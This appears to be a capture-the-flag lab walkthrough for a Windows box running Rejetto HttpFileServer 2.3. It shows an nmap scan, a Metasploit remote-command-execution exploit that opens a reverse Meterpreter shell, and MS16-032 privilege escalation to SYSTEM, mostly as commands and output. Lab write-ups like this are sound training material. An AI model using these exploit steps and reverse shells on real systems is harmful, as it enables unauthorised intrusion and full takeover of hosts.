NMAP
Start with our nmap scan with default scripts and version enumeration.
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 07:39 MST
Nmap scan report for 10.129.29.30
Host is up (0.058s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.68 seconds
USER
Using msfconsole Search fpr rejetto, the maker of the httpFileServer in use.
msf6 > search rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 0
Set our RHOST and LHOST. Run then background the session to try and priv esc.
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Using URL: http://10.10.16.18:8080/qqFRSJByHJj
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /qqFRSJByHJj
[*] Sending stage (175686 bytes) to 10.129.29.30
[!] Tried to delete %TEMP%\oWmXpBMw.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.10.10:4444 -> 10.129.29.30:49162) at 2022-12-21 07:42:16 -0700
meterpreter > shell
Process 2764 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
use C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas
PRIV ESC
Run exploit suggester and try the options that potentially work.
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.129.29.30 - Collecting local exploits for x86/windows...
[*] 10.129.29.30 - 174 exploit checks are being tried...
[+] 10.129.29.30 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.29.30 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 41 / 41
[*] 10.129.29.30 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
...<SNIP>...
[*] Post module execution completed
exploit/windows/local/bypassuac_eventvwr did not work so we try next on the next exploit/windows/local/ms16_032_secondary_logon_handle_privesc works!
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 2
session => 2
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.10.10
lhost => 10.10.10.10
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lport 4445
lport => 4445
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 10.10.16.18:4445
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\dnzbSYP.ps1...
[*] Compressing script contents...
[+] Compressed size: 3755
[*] Executing exploit script...
meterpreter > shell
Process 3016 created.
Channel 1 created.
iMicrosoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
# Flag
C:\Users\Administrator\Desktop>more root.txt
more root.txt